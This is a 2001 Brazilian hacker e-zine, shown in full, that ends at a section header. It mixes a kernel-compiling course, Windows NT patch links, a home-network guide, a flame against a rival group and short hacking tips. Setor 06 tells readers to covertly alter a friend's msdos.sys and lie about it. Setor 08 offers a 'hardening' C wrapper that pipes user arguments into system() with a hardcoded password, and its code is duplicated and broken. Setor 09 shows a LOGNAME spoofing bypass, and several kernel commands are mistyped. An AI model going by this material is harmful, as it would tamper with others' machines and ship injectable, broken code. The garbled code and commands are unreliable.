o..................................................................o
.ZZZZZZZZZZ  ..  NNNn    nNN EEEEEEE   sSSSSSS  bb        rrrrrrrr .
.ZzZ   ZZ      NN NN    NN EEeeeee  sSSS  sSs bb         rr   rr .
.Zz   ZZ     ii  NN  NN   NN EE       sSS       bbB        rrrrrrr .
.    ZZ      ii  NN   NN  NN EEeE       sSS     bbbbbbbbb  rrrr    .
.   ZZ   zZ  ii  NN    NN NN EE           sSS   bb   Bbbb  rr rr   .
.  ZZ   ZzZ  ii  NN     NNNN EEeeeee SSs  sSSS  bbB   bbb  rr  rr  .
.ZZZZZZZZZz iiii NNn     nNN EEEEEEE  sSSSSSs   bbbbbbbbb rrr   rr .
o..................................................................o
                                                          

.:x| Zine de Seguranca         |x:.
.:x| Edicao 03                 |x:.
.:x| Data: 10/02/2001          |x:.
.:x| #ZiNESbR - Rede BrasIRC   |x:.
.:x| http://zinesbr.hpg.com.br |x:.
.:x| zinesbr@ieg.com.br        |x:.

x Melhor visualizado no WordPad do Windows ou no VI do Linux  x
x Todo conteudo deste ZiNE sao para fim educativo             x
x Nao nos responsabilizamos por usos indevidos                x   
                                 _________   ___  
                                |         | |   | 
                                | ZiNESbr |.|hpG| 
                                | @#!?.* | |===| 
                                |_________| |___| 
                                     ||           
                                .----------.  _/  
                                |__________| (_)  
                          ..........................
_____________________________________________________________________
'''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''
      [SETORES]#                                [AUTORES]$    
   
<<[00][ Introducao	                       ][  Gotoxy  ][00]>>    
<<[01][ Outra Vulnerabilidade no BX            ][  Gotoxy  ][01]>>
<<[02][ Cursinho de Linux - parte 3            ][  Gotoxy  ][02]>> 
<<[03][ Identificando um Winmodem              ][  Gotoxy  ][03]>>
<<[04][ Grupo UnsekurityBR                     ][  Gotoxy  ][04]>>
<<[05][ Protegendo seu sistema - Parte 3       ][  Gotoxy  ][05]>>
<<[06][ "Escondendo" o Windows                 ][  Gotoxy  ][06]>>
<<[07][ Virus & Worms - A Diferenca            ][  Gotoxy  ][07]>>
<<[08][ Aumentando a Seguranca do Linux        ][  Gotoxy  ][08]>>  
<<[09][ Tecnica do burla-bash                  ][  Gotoxy  ][09]>>
<<[10][ Montando uma rede domestica            ][  Gotoxy  ][10]>>
<<[11][ Tecnica do burla-bash - Parte 2        ][  Gotoxy  ][11]>>
<<[12][ Backdoors - Parte 2                    ][  Gotoxy  ][12]>>
<<[13][ Ultimas palavras                       ][  Gotoxy  ][13]>>

______________________________________________________________________
'''''''''''''''''''''''''''''''''ZinesBr''''''''''''''''''''''''''''''


SETOR [00]
==[ Introducao ]==
==[ Por Gotoxy ]==

	Oie! Agora estamos na nossa edicao 03 do zinesbr (ohh)...
Espero q a comunidade fucadora esteja crescendo... e a comunidade
script kiddie diminuindo..:) 100% galera?! Ah! Entao tah blz..:)
Em nossa edicao 03,..tem muitas surpresas!!:) Uma delas eh o nosso
terceiro curso de linux; outra  montando uma rede domestica,etc..
Ah! Fiz algumas criticas a um grupo chamado UnsekurityBR pois eles
fizeram umas merda aih..(mais informacoes, leia setor 4).. E como
viram, nosso site mudou, nossos emails tb mudaram...agora tah tudo
novo!:) Ateh o canal #zines-br lah da brasirc agora eh #zinesbr...
Essas mudancas ocorreram pq o zines-br eh agora zinesbr..:) Essas
mudancas foi feita pelo nosso amigo e colaborador Kbytes!
      Entao tah certo, chega de blablas e uma b0a leitura!
 
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.









SETOR [01]
==[ Outra Vulnerabilidade no BX ]==
==[ por Gotoxy                  ]==

BX = BitchX

    O bx esta com uma outra vulnerabilidade em seu codigo. 
Desta vez, a versao do bx afetada eh a v1.0c16. A falha
consiste nas strings formatadas (%s%p%o%x, etc) que assim
permitem a execucao de codigos arbitrarios no bitchx. 
O exploit vem junto ao zine e o exploit foi testado no
RedHat versoes 6.0 e 7.0 e no Debian versao 2.2.

Format Bugs rlz! :)

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.









SETOR [02]
==[ Cursinho de Linux - parte 3 ]==
==[ por Gotoxy                  ]==

iNDICE
-[ 0 ]- introducao
-[ 1 ]- atualizando o kernel
-[ 2 ]- the end

iNTRODUCAO
-[0]- bom galera... estamos aih na nossa terceira edicao do 
'cursinho de linux'. espero estar ajudando os iniciantes a 
conhecer mais esse sistema.portanto,vamos agora aprender a 
atualizar o nosso kernel.

ATUALIZANDO O KERNEL
-[1]- a primeira coisa q devemos fazer eh pegar,ou melhor, 
downloadar o nosso kernel (nucleo do sistema). para fazermos 
o download, entre nesse ftp (ou outro que distribua kernels):

ftp://ftp.softaplic.lkams.kernel.org/pub/linux/kernel

Salve o arquivo no diretorio /usr/scr/linux e descompacte-o com 
a seguinte sintaxe:

# tar -zxvf linux-2.X.XX.tar.gz

Caso este kernel tenha patches vc pode aplica-los em vez de 
substituir todo o kernel. Portanto,vc deve utilizar os seguintes 
comandos:

# cd /usr/scr
# gzip -cd patchXX.gz | patch -p0

Apos este comando, voce deve verificar se algum arquivo apresentou 
algum problema. Portanto,digite o seguinte comando:

# find linux -name "*.rej"

Caso o sistema encontre algum arquivo .rej, significa que algo foi 
feito incorretamente. Portanto, voce deve verificar se a versao do 
kernel e dos patches sao compativeis. Caso tudo ocorreu certo,voce 
deve apagar os files q foram atualizados com o seguinte comando:

# find linux -name "*.orig" -exec r {} \;

Agora digite o comando abaixo para garantir q nao existem files ".o" 
(modulos) antigos:

# make mrproper

Ao fazer isso todos os files de atualizacao estarao instalados.Agora,
caso queira q o kernel seja configurado, digite:

# make menconfig

Ou caso vc esteja utilizando uma interface grafica, digite:

# make xconfig

Depois de configurar,salve a configuracao efetuada.Eh recomendavel vc
fazer uma copia do arkivo apenas como seguranca (por ex.: maquina.cfg). 
Assim, voce pode guardar a configuracao de diversas makinas.Neste caso,
lembre-se tb q a extensao do arkivo nao importa, o q importa mesmo eh a
declaracao correta no arkivo lilo.conf, q estah localizado no diretorio 
/etc.

Por fim, execute o comando abaixo para configurar as dependencias 
necessarias ao kernel:

# make dep; make clean

Agora, voce deve compilar a imagem do kernel com o seguinte comando:

# make zlmage

Caso alguma opcao tenha sido feita como modulos,execute o comando make 
modules, seguido de make modules_install para gerar e instalar os modulos
do kernel (/lib/modules).

Para reiniciar o linux com o novo kernel, copie o arkivo correspondente 
para o diretorio /boot e inclua uma entrada pra ele em /etc/lilo.conf.
O kernel gerado encontra-se em: 

/usr/src/linux/arch/i386/boot/zlimage

Agora, edite o arquivo /etc/lilo.conf e altere a seguinte linha:

image=/boot/NovoKernel

Depois disso, digite o comando abaixo para adicionar o novo kernel ao boot 
do sistema operacional LiNuX:

# lilo

Pronto! :)

THE END
-[2]- bom galera...chegamos ao fim do nosso cursinho de linux. na proxima 
edicao do zinesbr tem mais! confira! :)

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [03]
==[ Identificando um Winmodem ]==
==[ Por Gotoxy                ]==

Vou descrever pequeno texto, porem muito util, cujo obtivo do 
mesmo eh ajudar o caro leitor (no caso voce que estah lendo) 
como comprar um modem que nao seja wimmodem, ou seja,comprar 
um modem que funcione tanto no windows quanto no linux!
      
Se voce nao sabe o q eh um wimmodem, eu explico! Winmodem, sao
modens comuns, porem, soh funciona no sistema Windows. Porque??
Porque o sistema Linux nao possui drivers de hardwares! Drivers
sao pequenos softwares,q fazem o hardware funcionar corretamente.

b0m, portanto, quando voce for comprar um novo modem em uma 
loja de informatica, voce deve prosseguir os seguintes passos:
  
* Observe a placa: ela soh tem o chip de controle de linha 
telefonica.Os modens comuns tem, alem do chip citado,outro             
de controle de modulacao e demodulacao.Esse chip eh chamado
de ramdac e geralmente eh maior e tem mais componentes 
conectados na placa.

* Olhe tambem a caixa do modem, procure pelas informacoes,
como aos requisitos minimos do sistema.Se o modem solicitar
um processador acima de Pentium 133mhz,sistema Operacional
windows 95 ou superior, cuidado! Sao indicacoes de que se
trata de um modem designador p/ trabalhar somente no windows.

* Pergunte ao vendedor do produto (no caso o modem) se akele
modem que voce quer comprar, se trata de um winmodem! Se ele
nao souber lhe responder, peca a ele para perguntar aos outros
companheiros mais experientes no assunto e se possivel, fazer
um teste na propria loja (em algum computador de lah!).


blz, eh soh isso!
  
   obs: wimmodem sux! :)

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [04]
==[ Grupo UnsekurityBR ]==
==[ por Gotoxy         ]==

Recentemente foi lancado um outro zine, cujo nome eh UnsekurityBR...
eles fizeram algo q eu nao gostei... tipo, foi o seguinte.. na edicao
00 do zinesbr, eu fiz um texto de como se invadir usando a tecnica RDS 
(credu!:)) entao..esse grupo (unsekuritybr),teve a cara de pau de copiar 
o meu txto e fazer algumas mudancas para dispitar e aih eles publicaram 
na edicao do zine deles edicao 00.

portanto.. soh queria avisar isso para ninguem pensar q eu q copiei esse 
texto deles e sim eles copiaram de mim...
o cara q ousou em fazer isso eh um tal de F1r3h3ll
ah! vc tb copiaram um texto de pascal neh? bah..sejam criativos!

uma outra coisa... vcs da unsekuritybr sao uma cambada de 
scripts kiddies q ficam hackeando pages e se achando o maximo..
vao se fuder... nao se achem os "hackers" por isso.. saibam
diferenciar uma coisa de outra... saibam q a tecnica rds e
unicode nao estao no ibope! ficam usando exploits de terceiros
e se acham o maximo por isso.. 

e sejam criativos.. criem seus proprios textos..
se nao tem capacidade para isso, danem-se e terminem
com esse zine h4x0r!

tenho mais nada pra falar..
o q tinha pra falar eu jah falei..
agora, caso algum membro do unsekurtybr esteja lendo isso
e nao seguir uma etica e continuar mudando o index das
pages, dani-se!

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [05]
==[ Protegendo seu sistema - parte 3 ]==
==[ por Gotoxy                       ]==

Bom,essa eh a terceira parte do txt de como se proteger o seu sistema 
operacional  contra ataques.  Pois os  administradores  devem  cuidar
bastante do seu sistema, para que sempre tenha uma rede bem seguranca 
contra invasoes.

.inDice
.i)   Protegendo seu Windows NT 
.ii)  Terminando


***************************************
.i)   Protegendo seu sistema Windows NT
***************************************

O pessoal do BufferOverflow fez um texto de como os administradores que 
usam o windows nt podiam se proteger dos scripts kiddies. Sendo assim, 
abaixo eu coloco as mesmas coisas q eles colocaram, porem, com palavras 
diferentes :)

Na edicao 00 do zinesbr, eu fiz um texto de como se invadir pela tecnica 
de rds. Caso voce tenha lido, vc viu q podemos obter o path da pagina com 
qualquer browser. A correcao disso, voce encontra em:

http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 


Um outro ataque conhecido como UNICODE (muito usado por script kiddie) 
tambem  podem  ser  eliminado. Para  executar  esse ataque, o atacante 
utiliza um  programa conhecido como IISHack1.5. Para acabar de vez com 
esse problema, pegue a correcao em:

http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 
IIS 4.0
www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp 
IIS 5.0 
www.microsoft.com/windows2000/downloads/critical/q269862/default.asp 


*****************
.ii) Terminando
*****************

Caros amigos administradores, com isso voce ficarah livre dos scripts 
kiddies... pois, sao os unicos ataques q eles sabem fazer em um windows 
nt. Portanto, seu sistema agora  pode ficar  sem a enchecao de saco dos 
kiddah! 

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [06]
==[ "Escondendo" o Windows ]==
==[ Por Gotoxy             ]==

Isso nao eh uma atitude, digamos assim, "hacker". Fazer isso eh
soh mesmo para deixar o seu amigo um pouco espantado..:) Eu nunca
fiz isso, mas caso queira fazer isso, deixo aki a dica de como se
fazer o eskema. Eh o seguinte, quando voce estiver mechendo no pc
do seu amigo(rodando windows) voce espera ele destrair para agir.
A tecnica consiste em: toda vez que o seu amigo for entrar no win
ele nao vai conseguir, pois  toda vez ele vai "cair" no prompt do
ms-dos. Entenderam? Nao eh nada de extraordinario, mas  as  vezes
eh util..:) Eu testei isso uma unica vez no meu computador,quando
estava aki com o windows 98. Bom, chega de  papo mole, vamos logo
ao que interessa, o resto nao tem pressa! (bah).

  Eh muito simples, quando estiver no  prompt do ms-dos, digite o
comando "attrib c:\msdos.sys -r -a -h -s" (sem aspas) para  mudar 
as propriedades do arquivo msdos.sys. Logo, edite ele (msdos.sys)
e altere a linha "BootGUI=1" para "BootGUI=0". Salve o  arquivo e
saia dele e em seguida digite o comando "attrib +r +a +h +s" para
retornar com as propriedades do arkivo novamente.Por ser 1 eskema
q deve ser feito localmente, dificulta muito fazer o procedimento
descrito acima, portanto  quando seu amigo  se destrair voce deve 
agir bem rapidinho e caso ele seja leigo em informatica,vc apenas 
inventa uma desculpa bem boba que certamente ele devera "cair"...


                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [07]
==[ Virus & Worms - A Diferenca ]==
==[ Por Gotoxy                  ]==

Muitos ainda nao sabem a diferenca entre virus e worms. Com  esse
conceito em mente, venho eu a escrever esse simples texto que vai 
explicar  bem   detalhadamente  a  diferenca  entre  essas   duas 
"criaturas"  que  fazem  de  tudo  para aterrorizar a  internet e 
prejudicar os internautas..:)


                            -[ Virus ]-
                                                                   
Os virus sao pequenos programas de computador projetado para se 
espalhar  e  se  replicar sozinho, sem  que o usuario da makina 
infectada tenha conhecimento. Eles  podem se ocultar  dentro de 
programas executaveis,os chamados file infectors,contaminadores 
de arquivos) ou em documentos, como textos do Microsoft Word ou 
planilhas do Excel (estes sao macro viruses,ou virus de macro).
Ha ainda  uma  terceita e  mais  perigosa  categoria  de virus, 
conhecida  como  boot  sector  infectors.  Neste  caso, o virus
contamina o setor  de  inicializacao de  um  disquete ou HD, de 
forma q basta ligar o seu computador para que  o virus entre em 
funcionamento.


                            -[ Worms ]-

Os worms se  diferenciam dos virus pelo fato de nao se replicarem 
dentro de um mesmo computador. Eles (os worms)  procuram "saltar" 
de um computador para o outro. O maior perigo destes programas eh 
que eles se espalham facilmente atraves dos meios de comunicacao,
como emails de protocolos de rede.Geralmente,o Worm contamina uma 
maquina uma unica vez; depois  disso ele tenta migrar para outras 
estacoes atraves da rede.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [08]
==[ Aumentando a Seguranca do Linux ]==
==[ Por Gotoxy                      ]==
         
    Os administradores precisam de um pouco de sossego...e, por 
causa desse obetivo, estou eu aqui novamente para dar uma pequena 
mao aos nossos caros amigos administradores!!! b0m, eu nao vou me 
aprofundar muito...portanto, aih vai:

* O comando chattr

  Este comando sem duvida aumenta muito a seguranca de sua rede Linux.
Usuarios mal intecionados de sua rede, pode conseguir um r00t no mesmo
e deletar os terminais (Ex: rm -f /dev/tty2). Isso sem duvida,seria um
problema muito serio e com certeza daria muito dor de cabeca a voce,
caro admin! Portanto, para voce previnir que isso aconteca, basta deixar
os arquivos imutaveis, bastando digitar o comando chattr nos arkivos! 

A sintaxe do comando chattr eh esta::

root@localhost~#: chattr [opcoes] [arquivo]

 Onde:
[opcoes] voce coloca +ui (recomendado)
[arquivo] eh o arquivo a ser setado as permissoes
 
+ Portanto, deixe seus terminais imutaveis: 
 
root@localhost~#: chattr +ui /dev/tty1
root@localhost~#: chattr +ui /dev/tty2
root@localhost~#: chattr +ui /dev/tty3
...(etc)

+ Proteja seus arquivos de passwords tambem:

root@localhost~#: chattr +ui /etc/passwd
root@localhost~#: chattr +ui /etc/shadow

Obs: Lembre-se de quando for adicionar usuarios, digitar antes:

root@localhost~#: chattr -ui /etc/passwd
root@localhost~#: chattr -ui /etc/shadow

Depois de inserir seus usuarios, deixe imutaveis novamente!

+ Proteja tudo que voce achar que deve ser protegido..:)

  Com a opcao +ui, o chattr faz com q o arquivo nao seja deletado,
movido, ou qquer outra coisa q venha a causar danos ao arquivo...
O comando chattr pode ser usado em qquer arquivo e eu recomendo 
sempre usar a opcao +ui. Para mais informacoes, man chattr! 

  
  Para aumentar a seguranca do comando chattr (para virus e outras
coisas ruins nao fazerem merda no seu sistema),recomendo o programa 
abaixo, que simplesmente protege o comando chattr,pois os virus (por
exemplo) podem muito bem setar permissoes malicionas em seus arquivos 
de seu sistema e assim causando danos ao mesmo.

----------------------------- cha.c --------------------------------

/* Aumentando a seguranca do chattr                     */
/* Codado por Nash Leon Vulgo coracaodeleao             */
/* Eh recomendavel mudar o codigo abaixo a nivel        */
/* de kernel, caso manje de Loadable Kernel Module(LKM) */

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[0]){
char buffer[20],argumentos[40];
char comando[80];
if(argc < 3){
execl("/usr/bin/chattr","chattr",0);
exit(0);
}
if(argc == 3){
snprintf(argumentos,39,"%s %s",argv[1],argv[2]);
}
if(argc == 4){
snprintf(argumentos,39,"%s %s %s",argv[1],argv[2],argv[3]);
}
printf("Este comando eh bloqueado por senha.\n");
printf("Favor digitar a senha correta: ");
scanf("%19s",&buffer);
if(!strcmp(buffer,"senha")){
printf("senha ok!\n");
sprintf(comando,"/usr/bin/chattr %s",argumentos);
system(comando);
}
else{
printf("Senha Invalida!\n");
}
return 0;
}
scanf("%19s",&buffer);
if(!strcmp(buffer,"senha")){
printf("senha ok!\n");
sprintf(comando,"/usr/bin/chattr %s",argumentos);
system(comando);
}
else{
printf("Senha Invalida!\n");
}
return 0;
}
----------------------------- cha.c --------------------------------

+ Na Shell (Compilando)
root@localhost~#: gcc cha.c -o cha

Obs: A senha eh "senha" (sem aspas).


Para mais informacoes, recomendo que voce leia o texto que o Nash
Leon fez! Voce pode encontra-lo no site abaixo:
http://unsekurity.virtualave.net
O texto eh 'Aumentando a Seguranca de um Linux'.Recomendo a leitura
do mesmo por varios motivos, as quais nao eh necessario citar..:)
Ah!! E lembrando que esse texto eh soh para implementar um pouco o 
texto que o Nash fez.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR[09]
==[ Tecnica do burla-bash ]==
==[ Por Gotoxy            ]==
            
Shell Scripts suidroot "erram" na checagem de permissoes.Abaixo 
segue um exemplo de um shellscript vulneravel:

-------------------------- exemplo.sh  --------------------------
#!/bin/bash
# Shell Script Exemplo 
# Vulneravel a Environment

if [ "$LOGNAME" = "root" ]; then
  echo "Voce eh root!!!"
else
  echo "Voce nao eh root!!!"
fi

-----------------------------------------------------------------

[root@darkstar]# chmod a+x exemplo.sh
[root@darkstar]# ./exemplo
Voce eh root!!!
[root@darkstar]#

Como usuario normal:

[gotoxy@darkstar]$ ./exemplo.sh
Voce nao eh root!!!
[gotoxy@darkstar]$ export LOGNAME=root
[gotoxy@darkstar]$ ./exemplo.sh
Voce eh root!!!
[gotoxy@darkstar]$


  Explicando: como usuario normal, exportamos a variavel
LOGNAME e a definimos como root.Sendo assim,nos burlamos
o shellscript, ou seja, "enganamos" ele nos passando por
root. Isso funciona apenas em versoes do bash + antigas.


                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [10]
==[ Montando uma Rede Domestica ]==
==[ Por Gotoxy                  ]==

Obs: Com 2 Computadores     

t0picz:
1 - Introducao
2 - Equipamentos necessarios
3 - Instalacao dos equipamentos
4 - Configuracao
    4.1 - Introducao
    4.2 - Instalando a Placa de Rede
    4.3 - Instalando o Protocolo NetBEUI
    4.4 - Instalando o Protocolo TCP/iP
    4.5 - Atribuindo nomes e grupos
    4.6 - Compartilhando Arquivos
    4.7 - Compartilhando Impressoras
    4.8 - Acessando os dados compartilhados
5 - Compartilhando uma Conexao Web 
    5.1 - Configurando as estacoes
6 - Fim do Texto
------------------------------------------------------------------
                          
1 - Introducao  

Montar uma Rede nao eh dificil e os equipamentos necessarios para o 
mesmo nao sao tao caros. Escrevo esse texto tb porque quando eu fui 
montar a rede pro meu tio e passei uns "apertos"..:) Por isso, para 
facilitar a vida de todos, escrevo esse texto cujo autor oficial nao
sou eu! Para saber, v para o capitulo 6 deste texto. 

...
     Aezz,.. saiba que voce vai precisar comprar alguns utilizarios
para a instalacao da sua rede, portanto reserve um money(dinheiro)!
Como? Pow, se voce trampa pegue o seu proprio $$$, caso nao trabalhe
peca seu papai ou sua mamae..:)

--------------------------------------------------------------------

2 - Equipamentos necessarios
 
  Os equipamentos necessarios sao:

* 1 cabo do tipo crossover (cabo invertido) 
* 2 placas de rede pci de 10Mbps (recomendado)

Lembrando: sua rede vai ter apenas dois computadores e portanto nao
vai precisar de um hub.Se a sua rede vai ter mais de dois computerz,
voce vai precisar de um hub.E quanto as placas de rede  o seguinte:
cada computador deve ter uma placa de rede. Por exemplo, se sua rede 
tiver quatro computadores, vc vai precisar de quatro placas de rede!
Entendeu?

As placas de rede custam em cerca de $50,00 cada e o cabo invertido
custa em cerca de $1,50, o que daria um total de exatamente $101,50
 
-------------------------------------------------------------------
                               
3 -  Instalacao dos equipamentos

    Nao tem misterio! Basta instalar as placas de rede pci em cada 
computador de sua rede (eh soh encaixar no slot pci - um slot branco) 
e depois pegar o cabo crossover(o cabo invertido)e interligar seus 
computadores(consulte o manual para mais informacoes).

    Depois de fazer toda a infra-estrutura,vc deve fazer a configuracao 
pois nao basta apenas instalar as placas de rede e colocar o cabo crossover 
ligando os dois computadores para q sua rede jah esteja funcionando. Para 
ela funcionar corretamente eh necessario fazer algumas configuracoes no 
sitema. Portanto, leia o proximo capitulo! :)


---------------------------------------------------------------------------
                                  
4 - Configuracao 

  4.1 Introducao

   Agora chegou a parte mais facil..:) Porem antes de comecarmos, quero 
deixar bem claro que o procedimento aki eh pra Windows. Futuramente,eu
vou fazer um outro texto explicando a configurancao no sistema Linux.
Voce jah configurou toda a infra-estrutura neh? Continue lendo caso
responda sim. Pois a configuracao eh feita logo apos a infra-estruta
(oohh)..



  4.2 Instalando a Placa de Rede

Para instalar a placa rede, siga os passos abaixo:

- Entre no Painel de Controle e de um duplo clique em Redes. Uma janela
serah aberto, clique em Adicionar e depois em Adaptador e novamente click
em Adicionar.

- Uma nova janela serah aberta.Escolha o modelo da sua placa de rede na 
lista e pressione o botao OK.

- Caso voce possua um disquete contendo os drivers de sua placa de rede,
coloque ele no drive floppy (ohh) e depois click no botao Com Disco e
pressione OK.


  4.3 Instalando o Protocolo NetBEUI

   Sera necessario instalar esse protocolo na sua rede!! Lembre-se:
ele nao eh recomendavel para grandes redes! Para instala-lo,siga os 
passos abaixo:

- Entre no Painel de Controle, entre em Redes.Em seguida, clique em
Adicionar e depois click em Protocolo e novamente em Adicionar.

- Uma nova janela serah aberta (divida em duas partes).Do lado
esquerdo estah o fabricante e do lado direito esta o modelo. Do lado
esquedo(fabricante), escolha Microsoft e do lado direito escolha
NetBEUI e depois click em OK para iniciar a instalacao.

   Sua rede jah conta com um protocolo instalado. Agora, para voce
compartilhar arquivos e impressoras eh necessario instalar o protocolo
TCP/IP.


  4.4 Instalando o protocolo TCP/IP

   O Protocolo TCP/IP eh o mais conhecido! Eh o mesmo usado para voce
acessar a internet.Dificilmente voce encontra uma rede que nao esteje
funcionando com ele.Sua instalacao eh um pouco mais complicada, pois
precisamos deixar cada membro (computador) da rede com um endereco ip.
Veja como instala-lo:

- Entre no Painel de Controle e de um duplo clique em Redes.Depois,
clique em Adicionar, Protocolo e novamente Adicionar. Quando a janela
se abrir, escolha do lado esquerdo escolha Microsoft (fabricante) e
do lado direito selecione TCP/IP e clique em OK.

   Chegou a hora de especificar um enderedo ip para cada computador
da Rede. Acesse o Painel de Controle (em um computador em que o tcp/ip
jah esteja instalado) e clique em Redes. Depois, selecione o protocolo
TCP/IP e clique em Propriedades:

- Na tela em que aparece, clique em Especificar um Endereco IP.Eh neste
local que voce define o numero pelo qual este computador ficara conhecido
na rede.Voce pode colocar um numero entre 0.0.0.0 e 255.255.255.255.Porem,
p/ deixar as coisas + faceis,vc pode colocar o endereco ip 192.192.200.1
para o computador um, 192.192.200.2 para o computador dois.



  4.5 Atribuindo nomes e grupos

  Vamos colocar sua rede bem organizada, por isso vamos atribuir os nomes
para os seus computadores da rede.Alem de atribuir os nomes aos computerz,
vc deve criar um grupo de trabalho.Vejamos como fazer estas configuracoes:

- Na area de trabalho, clique com o botao direito do mouse sobre o icone
Ambiente de Rede e depois escolha Propriedades.Em seguida, clique na guia
'Identificacao'.

- Digite um nome para o computador (por exemplo, COMPUTADOR1) e um nome
para o grupo de trabalho (por exemplo o nome de sua empresa).

- Voce deve repetir o mesmo procedimento em cada computador de sua rede.
Mas como no nosso caso voce soh tem dois computadores, voce vai precisar
colocar nome e grupo soh para o seu "computador 2". Portanto, coloque
o nome de "COMPUTADOR2" (ou outro) para ele e o grupo de trabalho.


  4.6 Compartilhando Arquivos

  Para que o seu computador acesse os arquivos dos demais computadores
da rede, eh necessario fazer um compartilhamento.Para voce compartilhar
seus arkivos, siga os passos abaixo:

- Na area de trabalho, clique com o botao direito do mouse sobre o icone
Ambiente de Rede e depois escolha Propriedades.Em seguida, clique na guia
'Configuracao'.

- Clique no botao 'Compartilhamento de Arquivos e Impressoras'.Na janela
que se abre, ative as duas opcoes para que os outros computadores de sua
rede tenham acessos aos seus arquivos e impressoras.

- Agora voce deve compartilhar suas pastas. Para isso, basta clicar com
o botao direito do mouse sobre a pasta que voce deseja compartilhar e 
em seguida clicar em e 'Compartilhamento'. Escolha o tipo de acesso que
pode ser Somente Leitura, Completo ou Depende de Senha.Fique atento com
a seguranca pois se voce compartilhar suas pastas sem senha, "intrusos"
podem apagar dados importantes do seu sistema.Portanto, o recomendavel
eh voce utilizar a opcao 'Depende de Senha'.


  4.7 - Compartilhando Impressoras

  Compartilhar impressoras eh muito util para redes domesticas, jah
que a maioria das pessoas que tem dois computadores em casa possui
apenas uma impressora. O metodo para compartilhar as impressoras,eh
parecido com o de arquivos, portanto, siga os procedimentos abaixo:

-  Na area de trabalho, d um duplo clique em 'Meu Computador', em
seguida clique duas vezes em 'Impressoas'. Logo, clique com o botao
direito do mouse na impressora que deseja compartilhar.

- No menu que aparece, selecione a opcao Compartilhamento. Cloqie
em Compartilhado Como e, se voce quiser, escolha um nome pelo qual
a sua impressora ficarah conhecida na rede.


  4.8 Acessando os dados compartilhados

  Apos voce jah ter compartilhado seus arquivos e impressoas,basta 
agora voce saber acessa-los.Portanto,siga os procedimentos abaixo:

- Na Area de Trabalho, clique duas vezes em 'Ambiente de Rede'.
Caso voce tem apenas dois computadores ligados na rede, voce vai
ver dois icones, cada um representando um computador de sua rede.

- Clique duas vezes com o mouse no computador que voce queira 
acessar e pronto! Apos  fazer  isso  uma  lista  de  recursos 
compartilhados aparecer. No caso de uma pasta, basta dar um 
duplo clica nela para ver o seu conteudo.

- Para impressoras compartilhadas, clique com o botao direito 
do mouse e selecione Conectar-se. O Windows abrir um assistente
mostrando o procedimento de instalacao necessario.

  Apos fazer todos estes procedimentos, sua rede Windows estar
configurada e funcionando. No proximo setor, vamos aprender a
como compartilhar uma conexao web.

------------------------------------------------------------------

5 - Compartilhando uma Conexao Web 

  Se voce tem acesso a internet em apenas um computador de sua rede 
(pois eh o unico que tem modem),uma boa solucao eh compartilhar esta
conexao com as demais maquinas da rede. E a forma mais facil de se
fazer isso eh atraves do Internet Connection Sharing, um recurso
que esta disponivel no Windows 98 SE (Segunda Edicao), Windows
Millenium e Windows 2000.
  Porem, independente do sistema operacional, eh necessario que voce
tenha uma rede tcp/ip instalada e funcionando corretamente para este
recurso. Veja aki qual eh o procedimento necessario para fazer as
configuracoes no Windows 98 SE:

- Entre no Painel de Controle, d um duplo clique em 'Adicionar e
Remover Programas', clique sobre a guia 'Instalacao do Windows',
marque 'Ferramentas para a Internet' e aperte o botao 'Detalhes'.

- Marque a caixa Internet Connection Sharing e pressione o botao
'OK'. O processo de instalacao sera iniciado. Nesse momento,sera
necessario que voce coloque o disco de instalacao do win98se.

- Reinicie o computador. Preste muita atencao pois geralmente o
Internet Connection Sharing altera seu IP. Isto eh necessario p/
que as demais makinas  da  rede  possam  ter acessos  a  conexao 
compartilhada.

- Quando a makina iniciar, entre no Painel de Controle e clique
em 'Opcoes da Internet'. Depois  clique  na  opcao 'Conexao' e 
pressione o botao 'Compartilhamento de Conexao'.

- Marque a opcao que ativa o Compartilhamento.Ele esta localizado
na caixa 'Conectar a Internet Usando'. Em seguida, selecione sua
conexao Dial-up.

- Para finalizar, v  at  a  caixa  'Conectam-se    Minha  Rede
Domestica Usando' e selecione sua placa de rede.

  Pronto.Agora eh soh efetuar a conexao com o provedor para que 
ela esteja disponivel para as demais maquinas da rede.Veja agora
como configurar as estacoes para ter acesso a conexao compartilhada.


  5.1 - Configurando as estacoes
  
  O ultimo passo eh configurar as estacoes da rede para acessar a
maquina compartilhada. Para fazer isso, siga o procedimento abaixo:

- V em qquer estacao Windows da rede e clique com o botao direito
do mouse sobre o icone Ambiente de Rede e selecione 'Propriedades'.

- Escolha o protocolo TCP/IP para o adaptador de rede (cuidado para
nao selecionar a opcao TCP/IP da Rede Dial-Up, q eh usado em modens)
e pressione o botao 'Propriedades'.

- Na guia 'Enderecos IP',marke Obter um Endereco IP Automaticamente
e, na guia 'Enderecos DNS', marke Desativar DNS. Confirme clicando
em OK.

  Seu computador serah reiniciado. Quando o windows carregar, basta
abrir seu browser e navegar normalmente... acessar o irc, etc etc..
Enjoy!

--------------------------------------------------------------------
                             
6 - Fim do Texto 

  Esse texto eu retirei da revista PC Master edicao 44. Eu apenas
reescrivir o texto mudando algumas palavras.

Sem mais.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [11]
==[ Tecnica do burla-bash - Parte 2 ]==
